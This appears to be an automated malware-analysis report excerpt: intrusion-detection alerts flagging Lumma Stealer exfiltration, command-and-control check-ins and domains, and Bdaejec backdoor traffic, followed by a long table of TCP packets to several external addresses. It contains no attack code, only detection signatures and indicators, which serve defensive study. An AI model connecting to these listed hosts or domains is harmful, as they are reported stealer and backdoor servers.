2024-07-24T19:56:54.697261+0200	TCP	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	49760	443	192.168.2.10	188.114.96.3
2024-07-24T19:56:50.928961+0200	TCP	2054602	ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop)	49754	443	192.168.2.10	188.114.96.3
2024-07-24T19:56:54.154691+0200	TCP	2054602	ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop)	49760	443	192.168.2.10	188.114.96.3
2024-07-24T19:56:59.871319+0200	TCP	2054602	ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop)	49767	443	192.168.2.10	188.114.96.3
2024-07-24T19:57:17.531048+0200	TCP	2054604	ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop)	49780	443	192.168.2.10	172.67.213.85
2024-07-24T19:57:18.875038+0200	TCP	2054604	ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop)	49782	443	192.168.2.10	172.67.213.85
2024-07-24T19:57:22.094261+0200	TCP	2054604	ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop)	49785	443	192.168.2.10	172.67.213.85
2024-07-24T19:57:24.551102+0200	TCP	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	49787	443	192.168.2.10	172.67.213.85
2024-07-24T19:57:45.110905+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	49803	443	192.168.2.10	172.67.213.85
2024-07-24T19:57:05.217652+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	49772	443	192.168.2.10	188.114.96.3
2024-07-24T19:57:41.841093+0200	TCP	2054604	ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop)	49803	443	192.168.2.10	172.67.213.85
2024-07-24T19:57:22.834216+0200	TCP	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	49785	443	192.168.2.10	172.67.213.85
2024-07-24T19:57:19.383145+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	49782	443	192.168.2.10	172.67.213.85
2024-07-24T19:55:09.065962+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49703	799	192.168.2.10	44.221.84.105
2024-07-24T19:55:40.788193+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49712	799	192.168.2.10	44.221.84.105
2024-07-24T19:55:43.046215+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49715	799	192.168.2.10	44.221.84.105
2024-07-24T19:57:24.046577+0200	TCP	2054604	ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop)	49787	443	192.168.2.10	172.67.213.85
2024-07-24T19:55:05.253162+0200	UDP	2838522	ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup	51349	53	192.168.2.10	1.1.1.1
2024-07-24T19:55:41.395577+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49713	799	192.168.2.10	44.221.84.105

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 24, 2024 19:55:07.932502031 CEST	49703	799	192.168.2.10	44.221.84.105
Jul 24, 2024 19:55:07.937602997 CEST	799	49703	44.221.84.105	192.168.2.10
Jul 24, 2024 19:55:07.937777996 CEST	49703	799	192.168.2.10	44.221.84.105
Jul 24, 2024 19:55:07.938378096 CEST	49703	799	192.168.2.10	44.221.84.105
Jul 24, 2024 19:55:07.943240881 CEST	799	49703	44.221.84.105	192.168.2.10
Jul 24, 2024 19:55:09.065854073 CEST	799	49703	44.221.84.105	192.168.2.10
Jul 24, 2024 19:55:09.065963030 CEST	799	49703	44.221.84.105	192.168.2.10
Jul 24, 2024 19:55:09.065962076 CEST	49703	799	192.168.2.10	44.221.84.105
Jul 24, 2024 19:55:09.065983057 CEST	799	49703	44.221.84.105	192.168.2.10
Jul 24, 2024 19:55:09.066032887 CEST	49703	799	192.168.2.10	44.221.84.105
Jul 24, 2024 19:55:09.066138983 CEST	49703	799	192.168.2.10	44.221.84.105
Jul 24, 2024 19:55:09.066525936 CEST	799	49703	44.221.84.105	192.168.2.10
Jul 24, 2024 19:55:09.066600084 CEST	49703	799	192.168.2.10	44.221.84.105
Jul 24, 2024 19:55:09.067558050 CEST	799	49703	44.221.84.105	192.168.2.10
Jul 24, 2024 19:55:09.067621946 CEST	49703	799	192.168.2.10	44.221.84.105
Jul 24, 2024 19:55:09.077153921 CEST	49703	799	192.168.2.10	44.221.84.105
Jul 24, 2024 19:55:09.082031012 CEST	799	49703	44.221.84.105	192.168.2.10
Jul 24, 2024 19:55:39.948380947 CEST	49711	799	192.168.2.10	44.221.84.105
Jul 24, 2024 19:55:39.953352928 CEST	799	49711	44.221.84.105	192.168.2.10
Jul 24, 2024 19:55:39.953457117 CEST	49711	799	192.168.2.10	44.221.84.105
Jul 24, 2024 19:55:39.957458019 CEST	49711	799	192.168.2.10	44.221.84.105
Jul 24, 2024 19:55:39.962291002 CEST	799	49711	44.221.84.105	192.168.2.10
Jul 24, 2024 19:55:40.357336998 CEST	799	49711	44.221.84.105	192.168.2.10
Jul 24, 2024 19:55:40.357660055 CEST	799	49711	44.221.84.105	192.168.2.10
Jul 24, 2024 19:55:40.357738018 CEST	49711	799	192.168.2.10	44.221.84.105
Jul 24, 2024 19:55:40.369874001 CEST	49711	799	192.168.2.10	44.221.84.105
Jul 24, 2024 19:55:40.374850988 CEST	799	49711	44.221.84.105	192.168.2.10
Jul 24, 2024 19:55:40.395781994 CEST	49712	799	192.168.2.10	44.221.84.105
Jul 24, 2024 19:55:40.401002884 CEST	799	49712	44.221.84.105	192.168.2.10
Jul 24, 2024 19:55:40.401640892 CEST	49712	799	192.168.2.10	44.221.84.105
Jul 24, 2024 19:55:40.415846109 CEST	49712	799	192.168.2.10	44.221.84.105
Jul 24, 2024 19:55:40.422559023 CEST	799	49712	44.221.84.105	192.168.2.10
Jul 24, 2024 19:55:40.788125038 CEST	799	49712	44.221.84.105	192.168.2.10
Jul 24, 2024 19:55:40.788192987 CEST	49712	799	192.168.2.10	44.221.84.105
Jul 24, 2024 19:55:40.788788080 CEST	799	49712	44.221.84.105	192.168.2.10
Jul 24, 2024 19:55:40.788834095 CEST	49712	799	192.168.2.10	44.221.84.105
Jul 24, 2024 19:55:40.808151007 CEST	49712	799	192.168.2.10	44.221.84.105
Jul 24, 2024 19:55:40.813118935 CEST	799	49712	44.221.84.105	192.168.2.10
Jul 24, 2024 19:55:40.984081030 CEST	49713	799	192.168.2.10	44.221.84.105
Jul 24, 2024 19:55:40.989516973 CEST	799	49713	44.221.84.105	192.168.2.10
Jul 24, 2024 19:55:40.989609003 CEST	49713	799	192.168.2.10	44.221.84.105
Jul 24, 2024 19:55:40.989783049 CEST	49713	799	192.168.2.10	44.221.84.105
Jul 24, 2024 19:55:40.995042086 CEST	799	49713	44.221.84.105	192.168.2.10
Jul 24, 2024 19:55:41.395477057 CEST	799	49713	44.221.84.105	192.168.2.10
Jul 24, 2024 19:55:41.395576954 CEST	49713	799	192.168.2.10	44.221.84.105
Jul 24, 2024 19:55:41.395601034 CEST	799	49713	44.221.84.105	192.168.2.10
Jul 24, 2024 19:55:41.395679951 CEST	49713	799	192.168.2.10	44.221.84.105
Jul 24, 2024 19:55:41.424741983 CEST	49713	799	192.168.2.10	44.221.84.105
Jul 24, 2024 19:55:41.429884911 CEST	799	49713	44.221.84.105	192.168.2.10
Jul 24, 2024 19:55:42.654222012 CEST	49715	799	192.168.2.10	44.221.84.105
Jul 24, 2024 19:55:42.659123898 CEST	799	49715	44.221.84.105	192.168.2.10
Jul 24, 2024 19:55:42.659216881 CEST	49715	799	192.168.2.10	44.221.84.105
Jul 24, 2024 19:55:42.662909031 CEST	49715	799	192.168.2.10	44.221.84.105
Jul 24, 2024 19:55:42.667814970 CEST	799	49715	44.221.84.105	192.168.2.10
Jul 24, 2024 19:55:43.046120882 CEST	799	49715	44.221.84.105	192.168.2.10
Jul 24, 2024 19:55:43.046215057 CEST	49715	799	192.168.2.10	44.221.84.105
Jul 24, 2024 19:55:43.047267914 CEST	799	49715	44.221.84.105	192.168.2.10
Jul 24, 2024 19:55:43.047327042 CEST	49715	799	192.168.2.10	44.221.84.105
Jul 24, 2024 19:55:43.051461935 CEST	49715	799	192.168.2.10	44.221.84.105
Jul 24, 2024 19:55:43.056433916 CEST	799	49715	44.221.84.105	192.168.2.10
Jul 24, 2024 19:55:43.092382908 CEST	49716	799	192.168.2.10	44.221.84.105
Jul 24, 2024 19:55:43.101588964 CEST	799	49716	44.221.84.105	192.168.2.10
Jul 24, 2024 19:55:43.101663113 CEST	49716	799	192.168.2.10	44.221.84.105
Jul 24, 2024 19:55:43.114099026 CEST	49716	799	192.168.2.10	44.221.84.105
Jul 24, 2024 19:55:43.121213913 CEST	799	49716	44.221.84.105	192.168.2.10
Jul 24, 2024 19:55:43.508059978 CEST	799	49716	44.221.84.105	192.168.2.10
Jul 24, 2024 19:55:43.508122921 CEST	49716	799	192.168.2.10	44.221.84.105
Jul 24, 2024 19:55:43.508228064 CEST	799	49716	44.221.84.105	192.168.2.10
Jul 24, 2024 19:55:43.508270025 CEST	49716	799	192.168.2.10	44.221.84.105
Jul 24, 2024 19:55:43.519081116 CEST	49716	799	192.168.2.10	44.221.84.105
Jul 24, 2024 19:55:43.523905993 CEST	799	49716	44.221.84.105	192.168.2.10
Jul 24, 2024 19:55:45.886168957 CEST	49717	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:55:45.891465902 CEST	80	49717	189.165.133.52	192.168.2.10
Jul 24, 2024 19:55:45.891531944 CEST	49717	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:55:45.891680002 CEST	49717	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:55:45.891705990 CEST	49717	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:55:45.897031069 CEST	80	49717	189.165.133.52	192.168.2.10
Jul 24, 2024 19:55:45.897041082 CEST	80	49717	189.165.133.52	192.168.2.10
Jul 24, 2024 19:55:46.938671112 CEST	80	49717	189.165.133.52	192.168.2.10
Jul 24, 2024 19:55:46.939034939 CEST	80	49717	189.165.133.52	192.168.2.10
Jul 24, 2024 19:55:46.939121962 CEST	49717	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:55:46.939877987 CEST	49717	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:55:46.942456007 CEST	49718	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:55:46.944690943 CEST	80	49717	189.165.133.52	192.168.2.10
Jul 24, 2024 19:55:46.948703051 CEST	80	49718	189.165.133.52	192.168.2.10
Jul 24, 2024 19:55:46.948765993 CEST	49718	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:55:46.948877096 CEST	49718	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:55:46.948895931 CEST	49718	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:55:46.953785896 CEST	80	49718	189.165.133.52	192.168.2.10
Jul 24, 2024 19:55:46.953803062 CEST	80	49718	189.165.133.52	192.168.2.10
Jul 24, 2024 19:55:48.008116007 CEST	80	49718	189.165.133.52	192.168.2.10
Jul 24, 2024 19:55:48.008141041 CEST	80	49718	189.165.133.52	192.168.2.10
Jul 24, 2024 19:55:48.008235931 CEST	49718	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:55:48.008393049 CEST	49718	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:55:48.010766983 CEST	49719	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:55:48.013396978 CEST	80	49718	189.165.133.52	192.168.2.10
Jul 24, 2024 19:55:48.015630960 CEST	80	49719	189.165.133.52	192.168.2.10
Jul 24, 2024 19:55:48.015705109 CEST	49719	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:55:48.017388105 CEST	49719	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:55:48.017420053 CEST	49719	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:55:48.022166967 CEST	80	49719	189.165.133.52	192.168.2.10
Jul 24, 2024 19:55:48.023077011 CEST	80	49719	189.165.133.52	192.168.2.10
Jul 24, 2024 19:55:49.286451101 CEST	80	49719	189.165.133.52	192.168.2.10
Jul 24, 2024 19:55:49.287259102 CEST	80	49719	189.165.133.52	192.168.2.10
Jul 24, 2024 19:55:49.287312031 CEST	49719	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:55:49.287348032 CEST	49719	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:55:49.290477991 CEST	49720	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:55:49.292232990 CEST	80	49719	189.165.133.52	192.168.2.10
Jul 24, 2024 19:55:49.295427084 CEST	80	49720	189.165.133.52	192.168.2.10
Jul 24, 2024 19:55:49.295509100 CEST	49720	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:55:49.295620918 CEST	49720	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:55:49.295650005 CEST	49720	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:55:49.300555944 CEST	80	49720	189.165.133.52	192.168.2.10
Jul 24, 2024 19:55:49.300565958 CEST	80	49720	189.165.133.52	192.168.2.10
Jul 24, 2024 19:55:50.375511885 CEST	80	49720	189.165.133.52	192.168.2.10
Jul 24, 2024 19:55:50.375607014 CEST	80	49720	189.165.133.52	192.168.2.10
Jul 24, 2024 19:55:50.375679970 CEST	49720	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:55:50.375888109 CEST	49720	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:55:50.379106998 CEST	49721	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:55:50.381869078 CEST	80	49720	189.165.133.52	192.168.2.10
Jul 24, 2024 19:55:50.384087086 CEST	80	49721	189.165.133.52	192.168.2.10
Jul 24, 2024 19:55:50.384171963 CEST	49721	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:55:50.384366989 CEST	49721	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:55:50.384402990 CEST	49721	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:55:50.389411926 CEST	80	49721	189.165.133.52	192.168.2.10
Jul 24, 2024 19:55:50.389611006 CEST	80	49721	189.165.133.52	192.168.2.10
Jul 24, 2024 19:55:51.430130959 CEST	80	49721	189.165.133.52	192.168.2.10
Jul 24, 2024 19:55:51.432835102 CEST	80	49721	189.165.133.52	192.168.2.10
Jul 24, 2024 19:55:51.432929993 CEST	49721	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:55:51.433012009 CEST	49721	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:55:51.438251019 CEST	80	49721	189.165.133.52	192.168.2.10
Jul 24, 2024 19:55:51.440495014 CEST	49722	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:55:51.446794033 CEST	80	49722	189.165.133.52	192.168.2.10
Jul 24, 2024 19:55:51.446882010 CEST	49722	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:55:51.447033882 CEST	49722	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:55:51.447058916 CEST	49722	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:55:51.452243090 CEST	80	49722	189.165.133.52	192.168.2.10
Jul 24, 2024 19:55:51.452267885 CEST	80	49722	189.165.133.52	192.168.2.10
Jul 24, 2024 19:55:52.507863998 CEST	80	49722	189.165.133.52	192.168.2.10
Jul 24, 2024 19:55:52.508261919 CEST	80	49722	189.165.133.52	192.168.2.10
Jul 24, 2024 19:55:52.508514881 CEST	49722	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:55:52.508800983 CEST	49722	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:55:52.512342930 CEST	49723	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:55:52.513561010 CEST	80	49722	189.165.133.52	192.168.2.10
Jul 24, 2024 19:55:52.517777920 CEST	80	49723	189.165.133.52	192.168.2.10
Jul 24, 2024 19:55:52.519520044 CEST	49723	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:55:52.519596100 CEST	49723	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:55:52.519608974 CEST	49723	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:55:52.524522066 CEST	80	49723	189.165.133.52	192.168.2.10
Jul 24, 2024 19:55:52.525083065 CEST	80	49723	189.165.133.52	192.168.2.10
Jul 24, 2024 19:55:53.617111921 CEST	80	49723	189.165.133.52	192.168.2.10
Jul 24, 2024 19:55:53.617572069 CEST	80	49723	189.165.133.52	192.168.2.10
Jul 24, 2024 19:55:53.617855072 CEST	49723	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:55:53.620285034 CEST	49723	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:55:53.623555899 CEST	49724	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:55:53.625089884 CEST	80	49723	189.165.133.52	192.168.2.10
Jul 24, 2024 19:55:53.628689051 CEST	80	49724	189.165.133.52	192.168.2.10
Jul 24, 2024 19:55:53.628786087 CEST	49724	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:55:53.628927946 CEST	49724	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:55:53.628963947 CEST	49724	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:55:53.634114027 CEST	80	49724	189.165.133.52	192.168.2.10
Jul 24, 2024 19:55:53.636328936 CEST	80	49724	189.165.133.52	192.168.2.10
Jul 24, 2024 19:55:54.697163105 CEST	80	49724	189.165.133.52	192.168.2.10
Jul 24, 2024 19:55:54.697778940 CEST	80	49724	189.165.133.52	192.168.2.10
Jul 24, 2024 19:55:54.697865009 CEST	49724	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:55:54.697948933 CEST	49724	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:55:54.701661110 CEST	49725	80	192.168.2.10	77.221.157.163
Jul 24, 2024 19:55:54.702905893 CEST	80	49724	189.165.133.52	192.168.2.10
Jul 24, 2024 19:55:54.707153082 CEST	80	49725	77.221.157.163	192.168.2.10
Jul 24, 2024 19:55:54.707237959 CEST	49725	80	192.168.2.10	77.221.157.163
Jul 24, 2024 19:55:54.707387924 CEST	49725	80	192.168.2.10	77.221.157.163
Jul 24, 2024 19:55:54.713185072 CEST	80	49725	77.221.157.163	192.168.2.10
Jul 24, 2024 19:56:16.112101078 CEST	80	49725	77.221.157.163	192.168.2.10
Jul 24, 2024 19:56:16.112270117 CEST	49725	80	192.168.2.10	77.221.157.163
Jul 24, 2024 19:56:16.114320040 CEST	49725	80	192.168.2.10	77.221.157.163
Jul 24, 2024 19:56:16.118779898 CEST	49727	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:16.120098114 CEST	80	49725	77.221.157.163	192.168.2.10
Jul 24, 2024 19:56:16.126554012 CEST	80	49727	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:16.126692057 CEST	49727	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:16.126836061 CEST	49727	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:16.126872063 CEST	49727	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:16.134166956 CEST	80	49727	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:16.134907961 CEST	80	49727	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:17.278422117 CEST	80	49727	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:17.281794071 CEST	80	49727	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:17.281867981 CEST	49727	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:17.281958103 CEST	49727	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:17.285010099 CEST	49728	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:17.286905050 CEST	80	49727	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:17.290555000 CEST	80	49728	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:17.290625095 CEST	49728	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:17.290776968 CEST	49728	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:17.290802002 CEST	49728	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:17.296019077 CEST	80	49728	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:17.296032906 CEST	80	49728	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:18.352253914 CEST	80	49728	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:18.353010893 CEST	80	49728	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:18.353115082 CEST	49728	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:18.353163004 CEST	49728	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:18.358460903 CEST	80	49728	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:18.367558002 CEST	49729	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:18.372493982 CEST	80	49729	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:18.372575998 CEST	49729	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:18.372742891 CEST	49729	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:18.372772932 CEST	49729	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:18.377788067 CEST	80	49729	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:18.378737926 CEST	80	49729	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:19.420730114 CEST	80	49729	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:19.420927048 CEST	80	49729	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:19.421104908 CEST	49729	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:19.421684980 CEST	49729	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:19.426517010 CEST	80	49729	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:19.431358099 CEST	49730	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:19.437671900 CEST	80	49730	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:19.439507961 CEST	49730	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:19.439707041 CEST	49730	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:19.439729929 CEST	49730	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:19.444576979 CEST	80	49730	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:19.447571039 CEST	80	49730	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:20.746268988 CEST	80	49730	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:20.748536110 CEST	80	49730	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:20.748625040 CEST	49730	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:20.748665094 CEST	49730	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:20.751688004 CEST	49731	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:20.753649950 CEST	80	49730	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:20.757070065 CEST	80	49731	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:20.757194042 CEST	49731	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:20.757302999 CEST	49731	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:20.757581949 CEST	49731	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:20.771841049 CEST	80	49731	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:20.771995068 CEST	80	49731	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:21.836607933 CEST	80	49731	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:21.838764906 CEST	80	49731	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:21.838860035 CEST	49731	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:21.838913918 CEST	49731	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:21.842950106 CEST	49732	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:21.846534967 CEST	80	49731	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:21.848612070 CEST	80	49732	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:21.848686934 CEST	49732	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:21.848895073 CEST	49732	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:21.848895073 CEST	49732	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:21.853805065 CEST	80	49732	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:21.853820086 CEST	80	49732	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:22.971920013 CEST	80	49732	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:22.972824097 CEST	80	49732	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:22.972995043 CEST	49732	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:22.972995043 CEST	49732	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:22.975302935 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:22.978370905 CEST	80	49732	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:23.981226921 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.069170952 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.069225073 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.069333076 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.069581985 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.074537992 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.675224066 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.675364017 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.675379992 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.675452948 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.676071882 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.676086903 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.676188946 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.676795006 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.676810026 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.676875114 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.677608013 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.677622080 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.677716970 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.678333044 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.678395033 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.680499077 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.680974960 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.681054115 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.772582054 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.773078918 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.773092985 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.773274899 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.773668051 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.773839951 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.774290085 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.774303913 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.774404049 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.774879932 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.774893045 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.775036097 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.775382042 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.775396109 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.775469065 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.775949001 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.775962114 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.775974035 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.776117086 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.776566029 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.776577950 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.776678085 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.777139902 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.777154922 CEST	80	49733	64.190.113.113	192.168.2.10
